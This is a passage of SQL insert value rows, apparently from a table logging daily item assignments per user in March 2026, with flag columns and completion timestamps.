(1245, 225, 844, '2026-03-02', 0, 0, 0, NULL),
(1246, 225, 854, '2026-03-02', 1, 0, 0, '2026-03-06 01:34:12'),
(1247, 226, 1378, '2026-03-02', 0, 0, 0, NULL),
(1248, 226, 1437, '2026-03-02', 0, 0, 0, NULL),
(1249, 226, 1433, '2026-03-02', 0, 0, 0, NULL),
(1250, 226, 693, '2026-03-02', 0, 0, 0, NULL),
(1251, 226, 1373, '2026-03-02', 0, 0, 0, NULL),
(1252, 228, 849, '2026-03-02', 0, 0, 0, NULL),
(1253, 228, 854, '2026-03-02', 0, 0, 0, NULL),
(1254, 228, 714, '2026-03-02', 0, 0, 0, NULL),
(1255, 228, 1434, '2026-03-02', 0, 0, 0, NULL),
(1256, 228, 1439, '2026-03-02', 0, 0, 0, NULL),
(1257, 229, 1433, '2026-03-02', 1, 0, 0, '2026-03-02 21:29:07'),
(1258, 229, 1434, '2026-03-02', 1, 0, 0, '2026-03-02 21:29:07'),
(1259, 229, 854, '2026-03-02', 1, 0, 0, '2026-03-02 21:29:07'),
(1260, 229, 1385, '2026-03-02', 1, 0, 0, '2026-03-02 21:29:07'),
(1261, 229, 1377, '2026-03-02', 1, 0, 0, '2026-03-03 15:03:14'),
(1262, 213, 1433, '2026-03-02', 0, 0, 0, NULL),
(1263, 213, 844, '2026-03-02', 0, 0, 0, NULL),
(1264, 213, 942, '2026-03-02', 0, 0, 0, NULL),
(1265, 213, 1385, '2026-03-02', 0, 0, 0, NULL),
(1266, 213, 1437, '2026-03-02', 0, 0, 0, NULL),
(1267, 199, 731, '2026-03-02', 0, 0, 0, NULL),
(1268, 199, 1377, '2026-03-02', 0, 0, 0, NULL),
(1269, 199, 943, '2026-03-02', 0, 0, 0, NULL),
(1270, 199, 1387, '2026-03-02', 0, 0, 0, NULL),
(1271, 199, 1374, '2026-03-02', 0, 0, 0, NULL),
(1272, 217, 731, '2026-03-03', 0, 0, 0, NULL),
(1273, 217, 1442, '2026-03-03', 0, 0, 0, NULL),
(1274, 217, 1431, '2026-03-03', 0, 0, 0, NULL),
(1275, 217, 733, '2026-03-03', 0, 0, 0, NULL),
(1276, 217, 1384, '2026-03-03', 0, 0, 0, NULL),
(1277, 199, 1373, '2026-03-03', 0, 0, 0, NULL),
(1278, 199, 646, '2026-03-03', 0, 0, 0, NULL),
(1279, 199, 648, '2026-03-03', 0, 0, 0, NULL),
(1280, 199, 1389, '2026-03-03', 0, 0, 0, NULL),
(1281, 199, 693, '2026-03-03', 0, 0, 0, NULL),
(1282, 232, 693, '2026-03-03', 0, 0, 0, NULL),
(1283, 232, 942, '2026-03-03', 0, 0, 0, NULL),
(1284, 232, 1431, '2026-03-03', 0, 0, 0, NULL),
(1285, 232, 844, '2026-03-03', 0, 0, 0, NULL),
(1286, 232, 1378, '2026-03-03', 0, 0, 0, NULL),
(1287, 178, 1377, '2026-03-03', 0, 0, 0, NULL),
(1288, 178, 606, '2026-03-03', 0, 0, 0, NULL),
(1289, 178, 943, '2026-03-03', 0, 0, 0, NULL),
(1290, 178, 1433, '2026-03-03', 0, 0, 0, NULL),
(1291, 178, 1382, '2026-03-03', 0, 0, 0, NULL),
(1292, 177, 606, '2026-03-03', 1, 0, 0, '2026-03-03 11:56:55'),
(1293, 177, 735, '2026-03-03', 1, 0, 0, '2026-03-15 07:28:58'),
(1294, 177, 754, '2026-03-03', 1, 0, 0, '2026-03-03 11:56:55'),
(1295, 177, 1313, '2026-03-03', 1, 0, 0, '2026-03-03 11:56:55'),
(1296, 177, 1397, '2026-03-03', 1, 0, 0, '2026-03-03 11:56:55'),
(1297, 233, 848, '2026-03-03', 0, 0, 0, NULL),
(1298, 233, 1386, '2026-03-03', 1, 0, 0, '2026-03-03 15:13:40'),
(1299, 233, 847, '2026-03-03', 1, 0, 0, '2026-03-03 15:15:21'),
(1300, 233, 1441, '2026-03-03', 0, 0, 0, NULL),
(1301, 233, 844, '2026-03-03', 0, 0, 0, NULL),
(1302, 229, 1442, '2026-03-03', 1, 0, 0, '2026-03-04 14:44:04'),
(1303, 229, 733, '2026-03-03', 1, 0, 0, '2026-03-03 15:03:14'),
(1304, 229, 1377, '2026-03-03', 1, 0, 0, '2026-03-03 15:03:14'),
(1305, 229, 844, '2026-03-03', 1, 0, 0, '2026-03-03 15:03:14'),
(1306, 229, 1374, '2026-03-03', 1, 0, 0, '2026-03-03 15:03:14'),
(1307, 56, 1383, '2026-03-03', 0, 0, 0, NULL),
(1308, 56, 693, '2026-03-03', 0, 0, 0, NULL),
(1309, 56, 1433, '2026-03-03', 0, 0, 0, NULL),
(1310, 56, 1392, '2026-03-03', 0, 0, 0, NULL),
(1311, 56, 1389, '2026-03-03', 0, 0, 0, NULL),
(1312, 234, 731, '2026-03-03', 0, 0, 0, NULL),
(1313, 234, 1435, '2026-03-03', 0, 0, 0, NULL),
(1314, 234, 648, '2026-03-03', 0, 0, 0, NULL),
(1315, 234, 1439, '2026-03-03', 0, 0, 0, NULL),
(1316, 234, 1433, '2026-03-03', 0, 0, 0, NULL),
(1317, 235, 1435, '2026-03-03', 0, 0, 0, NULL),
(1318, 235, 1378, '2026-03-03', 0, 0, 0, NULL),
(1319, 235, 1382, '2026-03-03', 0, 0, 0, NULL),
(1320, 235, 1387, '2026-03-03', 0, 0, 0, NULL),
(1321, 235, 1375, '2026-03-03', 0, 0, 0, NULL),
(1322, 237, 1437, '2026-03-03', 0, 0, 0, NULL),
(1323, 237, 849, '2026-03-03', 0, 0, 0, NULL),
(1324, 237, 1385, '2026-03-03', 0, 0, 0, NULL),
(1325, 237, 854, '2026-03-03', 0, 0, 0, NULL),
(1326, 237, 733, '2026-03-03', 0, 0, 0, NULL),
(1327, 236, 1437, '2026-03-03', 1, 0, 0, '2026-03-04 02:27:14'),
(1328, 236, 1372, '2026-03-03', 1, 0, 0, '2026-03-04 02:27:14'),
(1329, 236, 641, '2026-03-03', 1, 0, 0, '2026-03-04 02:27:14'),
(1330, 236, 1431, '2026-03-03', 1, 0, 0, '2026-03-04 02:27:14'),
(1331, 236, 1390, '2026-03-03', 1, 0, 0, '2026-03-04 02:27:14'),
(1332, 189, 606, '2026-03-04', 0, 0, 0, NULL),
(1333, 189, 1440, '2026-03-04', 0, 0, 0, NULL),
(1334, 232, 1383, '2026-03-04', 0, 0, 0, NULL),
(1335, 232, 641, '2026-03-04', 0, 0, 0, NULL),
(1336, 232, 1377, '2026-03-04', 0, 0, 0, NULL),
(1337, 232, 646, '2026-03-04', 0, 0, 0, NULL),
(1338, 232, 714, '2026-03-04', 0, 0, 0, NULL),
(1339, 239, 714, '2026-03-04', 1, 0, 0, '2026-03-04 10:00:34'),
(1340, 239, 854, '2026-03-04', 1, 0, 0, '2026-03-04 10:00:34'),
(1341, 239, 1383, '2026-03-04', 1, 0, 0, '2026-03-04 10:00:34'),
(1342, 239, 1382, '2026-03-04', 1, 0, 0, '2026-03-04 10:00:34'),
(1343, 239, 1384, '2026-03-04', 1, 0, 0, '2026-03-04 10:00:34'),
(1344, 229, 1389, '2026-03-04', 1, 0, 0, '2026-03-04 14:44:04'),
(1345, 229, 1440, '2026-03-04', 1, 0, 0, '2026-03-04 14:44:04'),
(1346, 229, 643, '2026-03-04', 1, 0, 0, '2026-03-06 23:45:58'),
(1347, 229, 641, '2026-03-04', 1, 0, 0, '2026-03-04 14:44:04'),
(1348, 229, 1442, '2026-03-04', 1, 0, 0, '2026-03-04 14:44:04'),
(1349, 237, 1387, '2026-03-04', 0, 0, 0, NULL),
(1350, 237, 693, '2026-03-04', 0, 0, 0, NULL),
(1351, 237, 1436, '2026-03-04', 0, 0, 0, NULL),
(1352, 237, 1435, '2026-03-04', 0, 0, 0, NULL),
(1353, 237, 714, '2026-03-04', 0, 0, 0, NULL),
(1354, 241, 606, '2026-03-04', 0, 0, 0, NULL),
(1355, 241, 1437, '2026-03-04', 0, 0, 0, NULL),
(1356, 241, 733, '2026-03-04', 0, 0, 0, NULL),
(1357, 241, 849, '2026-03-04', 0, 0, 0, NULL),
(1358, 241, 1373, '2026-03-04', 0, 0, 0, NULL),
(1359, 217, 1373, '2026-03-04', 0, 0, 0, NULL),
(1360, 217, 733, '2026-03-04', 0, 0, 0, NULL),
(1361, 217, 1374, '2026-03-04', 0, 0, 0, NULL),
(1362, 217, 731, '2026-03-04', 0, 0, 0, NULL),
(1363, 217, 1384, '2026-03-04', 0, 0, 0, NULL),
(1364, 199, 854, '2026-03-04', 0, 0, 0, NULL),
(1365, 199, 1382, '2026-03-04', 0, 0, 0, NULL),
(1366, 199, 733, '2026-03-04', 0, 0, 0, NULL),
(1367, 199, 1438, '2026-03-04', 0, 0, 0, NULL),
(1368, 199, 1383, '2026-03-04', 0, 0, 0, NULL),
(1369, 244, 1438, '2026-03-04', 0, 0, 0, NULL),
(1370, 244, 1387, '2026-03-04', 0, 0, 0, NULL),
(1371, 244, 1391, '2026-03-04', 0, 0, 0, NULL),
(1372, 244, 1393, '2026-03-04', 0, 0, 0, NULL),
(1373, 244, 1379, '2026-03-04', 0, 0, 0, NULL),
(1374, 234, 1385, '2026-03-04', 0, 0, 0, NULL),
(1375, 234, 943, '2026-03-04', 0, 0, 0, NULL),
(1376, 234, 733, '2026-03-04', 0, 0, 0, NULL),
(1377, 234, 646, '2026-03-04', 0, 0, 0, NULL),
(1378, 234, 1437, '2026-03-04', 0, 0, 0, NULL),
(1379, 232, 1374, '2026-03-05', 0, 0, 0, NULL),
(1380, 232, 606, '2026-03-05', 0, 0, 0, NULL),
(1381, 232, 849, '2026-03-05', 0, 0, 0, NULL),
(1382, 232, 1438, '2026-03-05', 0, 0, 0, NULL),
(1383, 225, 854, '2026-03-05', 1, 0, 0, '2026-03-06 01:34:12'),
(1384, 225, 1440, '2026-03-05', 0, 0, 0, NULL),
(1385, 225, 606, '2026-03-05', 1, 0, 0, '2026-03-05 08:19:14'),
(1386, 225, 643, '2026-03-05', 1, 0, 0, '2026-03-09 05:47:02'),
(1387, 225, 1394, '2026-03-05', 0, 0, 0, NULL),
(1388, 245, 1385, '2026-03-05', 0, 0, 0, NULL),
(1389, 245, 1372, '2026-03-05', 0, 0, 0, NULL),
(1390, 245, 648, '2026-03-05', 0, 0, 0, NULL),
(1391, 245, 1373, '2026-03-05', 0, 0, 0, NULL),
(1392, 245, 641, '2026-03-05', 0, 0, 0, NULL),
(1393, 246, 643, '2026-03-05', 0, 0, 0, NULL),
(1394, 246, 1393, '2026-03-05', 0, 0, 0, NULL),
(1395, 246, 1383, '2026-03-05', 0, 0, 0, NULL),
(1396, 246, 1380, '2026-03-05', 0, 0, 0, NULL),
(1397, 246, 1376, '2026-03-05', 0, 0, 0, NULL),
(1398, 247, 1438, '2026-03-05', 0, 0, 0, NULL),
(1399, 247, 641, '2026-03-05', 0, 0, 0, NULL),
(1400, 247, 1442, '2026-03-05', 0, 0, 0, NULL),
(1401, 247, 849, '2026-03-05', 0, 0, 0, NULL),
(1402, 247, 1394, '2026-03-05', 0, 0, 0, NULL),
(1403, 248, 1380, '2026-03-05', 0, 0, 0, NULL),
(1404, 248, 733, '2026-03-05', 0, 0, 0, NULL),
(1405, 248, 1393, '2026-03-05', 0, 0, 0, NULL),
(1406, 248, 1432, '2026-03-05', 0, 0, 0, NULL),
(1407, 248, 731, '2026-03-05', 0, 0, 0, NULL),
(1408, 249, 643, '2026-03-05', 1, 0, 0, '2026-03-05 22:21:53'),
(1409, 249, 1442, '2026-03-05', 1, 0, 0, '2026-03-05 22:21:53'),
(1410, 249, 1382, '2026-03-05', 1, 0, 0, '2026-03-05 22:21:53'),
(1411, 249, 1387, '2026-03-05', 1, 0, 0, '2026-03-05 22:21:53'),
(1412, 249, 943, '2026-03-05', 1, 0, 0, '2026-03-05 22:21:53'),
(1413, 195, 1372, '2026-03-05', 0, 0, 0, NULL),
(1414, 195, 1382, '2026-03-05', 0, 0, 0, NULL),
(1415, 195, 1375, '2026-03-05', 0, 0, 0, NULL),
(1416, 195, 646, '2026-03-05', 0, 0, 0, NULL),
(1417, 195, 1394, '2026-03-05', 0, 0, 0, NULL),
(1418, 215, 731, '2026-03-05', 1, 0, 0, '2026-03-06 01:13:14'),
(1419, 215, 1381, '2026-03-05', 1, 0, 0, '2026-03-06 01:13:14'),
(1420, 215, 1388, '2026-03-05', 1, 0, 0, '2026-03-06 01:13:14'),
(1421, 215, 1393, '2026-03-05', 1, 0, 0, '2026-03-06 01:13:14'),
(1422, 215, 1442, '2026-03-05', 1, 0, 0, '2026-03-06 01:13:14'),
(1423, 250, 646, '2026-03-06', 0, 0, 0, NULL),
(1424, 250, 1379, '2026-03-06', 0, 0, 0, NULL),
(1425, 250, 1391, '2026-03-06', 0, 0, 0, NULL),
(1426, 250, 1434, '2026-03-06', 0, 0, 0, NULL),
(1427, 250, 1431, '2026-03-06', 0, 0, 0, NULL),
(1428, 251, 648, '2026-03-06', 0, 0, 0, NULL),
(1429, 251, 1380, '2026-03-06', 0, 0, 0, NULL),
(1430, 251, 641, '2026-03-06', 0, 0, 0, NULL),
(1431, 251, 1389, '2026-03-06', 0, 0, 0, NULL),
(1432, 251, 1381, '2026-03-06', 0, 0, 0, NULL),
(1433, 254, 1375, '2026-03-06', 0, 0, 0, NULL),
(1434, 254, 1377, '2026-03-06', 0, 0, 0, NULL),
(1435, 254, 1382, '2026-03-06', 0, 0, 0, NULL),
(1436, 254, 1380, '2026-03-06', 0, 0, 0, NULL),
(1437, 254, 1373, '2026-03-06', 0, 0, 0, NULL),
(1438, 256, 1439, '2026-03-06', 0, 0, 0, NULL),
(1439, 256, 646, '2026-03-06', 0, 0, 0, NULL),
(1440, 256, 1375, '2026-03-06', 0, 0, 0, NULL),
(1441, 256, 733, '2026-03-06', 0, 0, 0, NULL),
(1442, 256, 1434, '2026-03-06', 0, 0, 0, NULL),
(1443, 225, 943, '2026-03-06', 1, 0, 0, '2026-03-06 13:20:33'),
(1444, 225, 942, '2026-03-06', 1, 0, 0, '2026-03-06 13:23:45'),
(1445, 225, 849, '2026-03-06', 1, 0, 0, '2026-03-06 13:15:27'),
(1446, 225, 1442, '2026-03-06', 1, 0, 0, '2026-03-06 13:00:02'),
(1447, 225, 1379, '2026-03-06', 1, 0, 0, '2026-03-06 13:27:43'),
(1449, 225, 1390, '2026-03-06', 1, 0, 0, '2026-03-06 13:28:45'),
(1450, 225, 733, '2026-03-06', 1, 0, 0, '2026-03-06 13:30:56'),
(1451, 257, 1431, '2026-03-06', 1, 0, 0, '2026-03-06 13:16:04'),
(1452, 257, 1381, '2026-03-06', 1, 0, 0, '2026-03-06 13:16:04'),
(1453, 257, 943, '2026-03-06', 1, 0, 0, '2026-03-06 13:16:04'),
(1454, 257, 646, '2026-03-06', 1, 0, 0, '2026-03-06 13:16:04'),
(1455, 257, 1393, '2026-03-06', 1, 0, 0, '2026-03-06 13:16:04'),
(1456, 258, 1432, '2026-03-06', 0, 0, 0, NULL),
(1457, 258, 1393, '2026-03-06', 0, 0, 0, NULL),
(1458, 258, 1385, '2026-03-06', 0, 0, 0, NULL),
(1459, 258, 1381, '2026-03-06', 0, 0, 0, NULL),
(1460, 258, 648, '2026-03-06', 0, 0, 0, NULL),
(1461, 213, 1385, '2026-03-06', 0, 0, 0, NULL),
(1462, 213, 1381, '2026-03-06', 0, 0, 0, NULL),
(1463, 213, 1439, '2026-03-06', 0, 0, 0, NULL),
(1464, 213, 646, '2026-03-06', 0, 0, 0, NULL),
(1465, 213, 1391, '2026-03-06', 0, 0, 0, NULL),
(1466, 232, 1384, '2026-03-06', 0, 0, 0, NULL),
(1467, 232, 648, '2026-03-06', 0, 0, 0, NULL),
(1468, 232, 1382, '2026-03-06', 0, 0, 0, NULL),
(1469, 232, 1389, '2026-03-06', 0, 0, 0, NULL),
(1470, 229, 1376, '2026-03-06', 1, 0, 0, '2026-03-06 23:45:58'),
(1471, 229, 1381, '2026-03-06', 1, 0, 0, '2026-03-06 23:45:58'),
(1472, 229, 643, '2026-03-06', 1, 0, 0, '2026-03-06 23:45:58'),
(1473, 229, 648, '2026-03-06', 1, 0, 0, '2026-03-06 23:45:58'),
(1474, 229, 1382, '2026-03-06', 1, 0, 0, '2026-03-06 23:45:58'),
(1475, 259, 1431, '2026-03-06', 1, 0, 0, '2026-03-07 00:46:28'),
(1476, 259, 1381, '2026-03-06', 1, 0, 0, '2026-03-07 00:46:28'),
(1477, 259, 1385, '2026-03-06', 1, 0, 0, '2026-03-07 00:46:28'),
(1478, 259, 1375, '2026-03-06', 1, 0, 0, '2026-03-07 00:46:28'),
(1479, 259, 1382, '2026-03-06', 1, 0, 0, '2026-03-07 00:46:28'),
(1480, 247, 1387, '2026-03-07', 0, 0, 0, NULL),
(1481, 247, 643, '2026-03-07', 0, 0, 0, NULL),
(1482, 247, 1393, '2026-03-07', 0, 0, 0, NULL),
(1483, 247, 1440, '2026-03-07', 0, 0, 0, NULL),
(1484, 247, 1434, '2026-03-07', 0, 0, 0, NULL),
(1485, 142, 731, '2026-03-07', 1, 0, 0, '2026-03-07 08:12:35'),
(1486, 142, 648, '2026-03-07', 0, 0, 0, NULL),
(1487, 142, 1440, '2026-03-07', 0, 0, 0, NULL),
(1488, 142, 646, '2026-03-07', 0, 0, 0, NULL),
(1489, 142, 1387, '2026-03-07', 1, 0, 0, '2026-03-07 08:14:55'),
(1490, 232, 1380, '2026-03-07', 0, 0, 0, NULL),
(1491, 232, 1384, '2026-03-07', 0, 0, 0, NULL),
(1492, 232, 1375, '2026-03-07', 0, 0, 0, NULL),
(1493, 232, 1391, '2026-03-07', 0, 0, 0, NULL),
(1494, 232, 643, '2026-03-07', 0, 0, 0, NULL),
(1495, 232, 1388, '2026-03-07', 0, 0, 0, NULL),
(1496, 232, 1385, '2026-03-07', 0, 0, 0, NULL),
(1497, 232, 1376, '2026-03-07', 0, 0, 0, NULL),
(1498, 261, 1380, '2026-03-07', 0, 0, 0, NULL),
(1499, 261, 1373, '2026-03-07', 0, 0, 0, NULL),
(1500, 261, 1376, '2026-03-07', 0, 0, 0, NULL),
(1501, 261, 1384, '2026-03-07', 0, 0, 0, NULL),
(1502, 261, 1391, '2026-03-07', 0, 0, 0, NULL),
(1503, 260, 1393, '2026-03-07', 0, 0, 0, NULL),
(1504, 260, 1439, '2026-03-07', 0, 0, 0, NULL),
(1505, 260, 643, '2026-03-07', 0, 0, 0, NULL),
(1506, 260, 1375, '2026-03-07', 0, 0, 0, NULL),
(1507, 260, 1373, '2026-03-07', 0, 0, 0, NULL),
(1508, 225, 1375, '2026-03-07', 1, 0, 0, '2026-03-07 14:41:37'),
(1509, 225, 1388, '2026-03-07', 1, 0, 0, '2026-03-07 14:44:59'),
(1510, 225, 1381, '2026-03-07', 1, 0, 0, '2026-03-07 14:46:07'),
(1511, 225, 1374, '2026-03-07', 1, 0, 0, '2026-03-07 13:38:52'),
(1512, 225, 1380, '2026-03-07', 1, 0, 0, '2026-03-07 13:42:21'),
(1513, 225, 1385, '2026-03-07', 1, 0, 0, '2026-03-07 13:44:21'),
(1515, 225, 1376, '2026-03-07', 1, 0, 0, '2026-03-07 14:43:03'),
(1516, 177, 641, '2026-03-07', 1, 0, 0, '2026-03-07 22:11:43'),
(1517, 177, 735, '2026-03-07', 1, 0, 0, '2026-03-15 07:28:58'),
(1518, 177, 738, '2026-03-07', 1, 0, 0, '2026-03-07 22:11:43'),
(1519, 177, 1312, '2026-03-07', 1, 0, 0, '2026-03-07 22:11:43'),
(1520, 177, 1395, '2026-03-07', 1, 0, 0, '2026-03-07 22:11:43'),
(1521, 259, 1432, '2026-03-07', 0, 0, 0, NULL),
(1522, 259, 1389, '2026-03-07', 0, 0, 0, NULL),
(1523, 259, 1393, '2026-03-07', 0, 0, 0, NULL),
(1524, 259, 1382, '2026-03-07', 0, 0, 0, NULL),
(1525, 259, 1437, '2026-03-07', 0, 0, 0, NULL),
(1526, 199, 1373, '2026-03-07', 0, 0, 0, NULL),
(1527, 199, 1393, '2026-03-07', 0, 0, 0, NULL),
(1528, 199, 1432, '2026-03-07', 0, 0, 0, NULL),
(1529, 199, 1439, '2026-03-07', 0, 0, 0, NULL),
(1530, 199, 641, '2026-03-07', 0, 0, 0, NULL),
(1531, 232, 1382, '2026-03-08', 0, 0, 0, NULL),
(1532, 232, 1393, '2026-03-08', 0, 0, 0, NULL),
(1533, 232, 1389, '2026-03-08', 0, 0, 0, NULL),
(1534, 232, 1432, '2026-03-08', 0, 0, 0, NULL),
(1535, 260, 1382, '2026-03-08', 0, 0, 0, NULL),
(1536, 260, 1439, '2026-03-08', 0, 0, 0, NULL),
(1537, 260, 1373, '2026-03-08', 0, 0, 0, NULL),
(1538, 260, 1391, '2026-03-08', 0, 0, 0, NULL),
(1539, 260, 641, '2026-03-08', 0, 0, 0, NULL),
(1540, 232, 643, '2026-03-08', 0, 0, 0, NULL),
(1541, 232, 1391, '2026-03-08', 0, 0, 0, NULL),
(1542, 232, 1384, '2026-03-08', 0, 0, 0, NULL),
(1543, 232, 1437, '2026-03-08', 0, 0, 0, NULL),
(1544, 177, 651, '2026-03-08', 1, 0, 0, '2026-03-15 07:28:58'),
(1545, 177, 696, '2026-03-08', 1, 0, 0, '2026-03-11 10:11:36'),
(1546, 177, 652, '2026-03-08', 1, 0, 0, '2026-03-08 14:24:47'),
(1547, 177, 1405, '2026-03-08', 1, 0, 0, '2026-03-11 10:11:36'),
(1548, 177, 697, '2026-03-08', 1, 0, 0, '2026-03-08 14:24:47'),
(1549, 222, 1437, '2026-03-08', 0, 0, 0, NULL),
(1550, 222, 1432, '2026-03-08', 0, 0, 0, NULL),
(1551, 222, 1431, '2026-03-08', 0, 0, 0, NULL),
(1552, 222, 1391, '2026-03-08', 0, 0, 0, NULL),
(1553, 222, 641, '2026-03-08', 0, 0, 0, NULL),
(1554, 189, 1391, '2026-03-08', 0, 0, 0, NULL),
(1555, 189, 1373, '2026-03-08', 0, 0, 0, NULL),
(1556, 189, 643, '2026-03-08', 0, 0, 0, NULL),
(1557, 189, 1389, '2026-03-08', 0, 0, 0, NULL),
(1558, 263, 1393, '2026-03-08', 1, 0, 0, '2026-03-09 01:31:54'),
(1559, 263, 1431, '2026-03-08', 1, 0, 0, '2026-03-09 01:31:54'),
(1560, 263, 1391, '2026-03-08', 1, 0, 0, '2026-03-09 01:31:54'),
(1561, 263, 1382, '2026-03-08', 1, 0, 0, '2026-03-09 01:31:54'),
(1562, 263, 1384, '2026-03-08', 1, 0, 0, '2026-03-09 01:31:54'),
(1563, 225, 641, '2026-03-08', 1, 0, 0, '2026-03-09 05:34:11'),
(1564, 225, 1393, '2026-03-08', 1, 0, 0, '2026-03-09 05:43:36'),
(1565, 225, 1389, '2026-03-08', 0, 0, 0, NULL),
(1566, 225, 1382, '2026-03-08', 1, 0, 0, '2026-03-09 05:42:09'),
(1567, 225, 1373, '2026-03-09', 1, 0, 0, '2026-03-09 05:32:56'),
(1568, 225, 1393, '2026-03-09', 1, 0, 0, '2026-03-09 05:43:36'),
(1569, 225, 641, '2026-03-09', 1, 0, 0, '2026-03-09 05:34:11'),
(1570, 225, 1384, '2026-03-09', 1, 0, 0, '2026-03-09 05:35:16'),
(1571, 225, 1391, '2026-03-09', 1, 0, 0, '2026-03-09 05:45:31'),
(1572, 225, 1382, '2026-03-09', 1, 0, 0, '2026-03-09 05:42:09'),
(1573, 225, 643, '2026-03-09', 1, 0, 0, '2026-03-09 05:47:02'),
(1575, 189, 1391, '2026-03-09', 0, 0, 0, NULL),
(1576, 189, 643, '2026-03-09', 0, 0, 0, NULL),
(1577, 189, 1389, '2026-03-09', 0, 0, 0, NULL),
(1578, 189, 1439, '2026-03-09', 0, 0, 0, NULL),
(1580, 189, 1431, '2026-03-09', 0, 0, 0, NULL),
(1581, 222, 1431, '2026-03-09', 0, 0, 0, NULL),
(1582, 222, 1439, '2026-03-09', 0, 0, 0, NULL),
(1583, 222, 1389, '2026-03-09', 0, 0, 0, NULL),
(1584, 222, 1432, '2026-03-09', 0, 0, 0, NULL),
(1585, 261, 1431, '2026-03-09', 0, 0, 0, NULL),
(1586, 261, 1389, '2026-03-09', 0, 0, 0, NULL),
(1587, 261, 1432, '2026-03-09', 0, 0, 0, NULL),
(1588, 261, 1439, '2026-03-09', 0, 0, 0, NULL),
(1589, 34, 1413, '2026-03-09', 0, 0, 0, NULL),
(1590, 34, 1409, '2026-03-09', 0, 0, 0, NULL),
(1591, 34, 1414, '2026-03-09', 0, 0, 0, NULL),
(1592, 34, 938, '2026-03-09', 0, 0, 0, NULL),
(1593, 34, 1407, '2026-03-09', 1, 0, 0, '2026-03-10 04:19:25'),
(1595, 34, 1255, '2026-03-09', 0, 0, 0, NULL),
(1596, 34, 720, '2026-03-09', 0, 0, 0, NULL),
(1597, 264, 1431, '2026-03-09', 1, 0, 0, '2026-03-09 12:46:11'),
(1598, 264, 1432, '2026-03-09', 1, 0, 0, '2026-03-09 12:46:11'),
(1599, 264, 1439, '2026-03-09', 1, 0, 0, '2026-03-09 12:46:11'),
(1600, 264, 1389, '2026-03-09', 1, 0, 0, '2026-03-09 12:46:11'),
(1601, 126, 1389, '2026-03-09', 0, 0, 0, NULL),
(1602, 126, 1439, '2026-03-09', 0, 0, 0, NULL),
(1603, 126, 1431, '2026-03-09', 0, 0, 0, NULL),
(1604, 126, 1432, '2026-03-09', 0, 0, 0, NULL),
(1606, 266, 1431, '2026-03-09', 1, 0, 0, '2026-03-09 16:26:47'),
(1607, 266, 1432, '2026-03-09', 0, 0, 0, NULL),
(1608, 266, 1389, '2026-03-09', 0, 0, 0, NULL),
(1609, 266, 1439, '2026-03-09', 1, 0, 0, '2026-03-09 16:42:00'),
(1626, 55, 1389, '2026-03-09', 0, 0, 0, NULL),
(1627, 55, 1431, '2026-03-09', 0, 0, 0, NULL),
(1628, 55, 1432, '2026-03-09', 0, 0, 0, NULL),
(1629, 55, 1439, '2026-03-09', 0, 0, 0, NULL),
(1647, 232, 1389, '2026-03-09', 0, 0, 0, NULL),
(1648, 232, 1432, '2026-03-09', 0, 0, 0, NULL),
(1649, 232, 651, '2026-03-09', 0, 0, 0, NULL),
(1650, 232, 696, '2026-03-09', 0, 0, 0, NULL),
(1651, 232, 738, '2026-03-09', 1, 0, 0, '2026-03-09 21:19:31'),
(1652, 232, 938, '2026-03-09', 1, 0, 0, '2026-03-09 21:22:17'),
(1653, 232, 1310, '2026-03-09', 1, 0, 0, '2026-03-09 21:23:29'),
(1654, 34, 1412, '2026-03-10', 1, 0, 0, '2026-03-10 04:19:25'),
(1655, 34, 1410, '2026-03-10', 1, 0, 0, '2026-03-10 04:19:25'),
(1656, 34, 1415, '2026-03-10', 1, 0, 0, '2026-03-10 04:19:25'),
(1657, 34, 1411, '2026-03-10', 1, 0, 0, '2026-03-10 04:19:25'),
(1658, 34, 1407, '2026-03-10', 1, 0, 0, '2026-03-10 04:19:25'),
(1662, 232, 651, '2026-03-10', 0, 0, 0, NULL),
(1663, 232, 716, '2026-03-10', 0, 0, 0, NULL),
(1664, 232, 1043, '2026-03-10', 0, 0, 0, NULL),
(1665, 232, 933, '2026-03-10', 0, 0, 0, NULL),
(1666, 232, 1406, '2026-03-10', 0, 0, 0, NULL),
(1667, 34, 1414, '2026-03-11', 0, 0, 0, NULL),
(1668, 34, 1253, '2026-03-11', 0, 0, 0, NULL),
(1669, 34, 1255, '2026-03-11', 0, 0, 0, NULL),
(1670, 34, 655, '2026-03-11', 0, 0, 0, NULL),
(1671, 34, 1408, '2026-03-11', 0, 0, 0, NULL),
(1672, 34, 1407, '2026-03-11', 0, 0, 0, NULL),
(1673, 34, 1409, '2026-03-11', 0, 0, 0, NULL),
(1674, 34, 654, '2026-03-11', 0, 0, 0, NULL),
(1675, 177, 1043, '2026-03-11', 1, 0, 0, '2026-03-11 10:11:36'),
(1676, 177, 696, '2026-03-11', 1, 0, 0, '2026-03-11 10:11:36'),
(1677, 177, 737, '2026-03-11', 1, 0, 0, '2026-03-11 10:11:36'),
(1678, 177, 1405, '2026-03-11', 1, 0, 0, '2026-03-11 10:11:36'),
(1679, 177, 1042, '2026-03-11', 1, 0, 0, '2026-03-15 07:28:58'),
(1680, 232, 737, '2026-03-11', 0, 0, 0, NULL),
(1681, 232, 696, '2026-03-11', 0, 0, 0, NULL),
(1682, 232, 932, '2026-03-11', 0, 0, 0, NULL),
(1683, 232, 1398, '2026-03-11', 0, 0, 0, NULL),
(1684, 232, 1400, '2026-03-11', 0, 0, 0, NULL),
(1685, 34, 1410, '2026-03-12', 0, 0, 0, NULL),
(1686, 34, 1415, '2026-03-12', 0, 0, 0, NULL),
(1687, 34, 1413, '2026-03-12', 0, 0, 0, NULL),
(1688, 34, 1406, '2026-03-12', 0, 0, 0, NULL),
(1691, 34, 1414, '2026-03-12', 0, 0, 0, NULL),
(1692, 34, 652, '2026-03-12', 0, 0, 0, NULL),
(1693, 34, 1411, '2026-03-13', 0, 0, 0, NULL),
(1694, 34, 1255, '2026-03-13', 0, 0, 0, NULL),
(1695, 34, 1407, '2026-03-13', 0, 0, 0, NULL),
(1696, 34, 770, '2026-03-13', 0, 0, 0, NULL),
(1697, 34, 1415, '2026-03-13', 0, 0, 0, NULL),
(1698, 34, 1413, '2026-03-13', 0, 0, 0, NULL),
(1700, 34, 1414, '2026-03-13', 0, 0, 0, NULL),
(1701, 232, 754, '2026-03-13', 0, 0, 0, NULL),
(1702, 232, 737, '2026-03-13', 0, 0, 0, NULL),
(1703, 232, 652, '2026-03-13', 0, 0, 0, NULL),
(1704, 232, 1403, '2026-03-13', 0, 0, 0, NULL),
(1705, 232, 1308, '2026-03-13', 0, 0, 0, NULL),
(1706, 232, 834, '2026-03-14', 0, 0, 0, NULL),
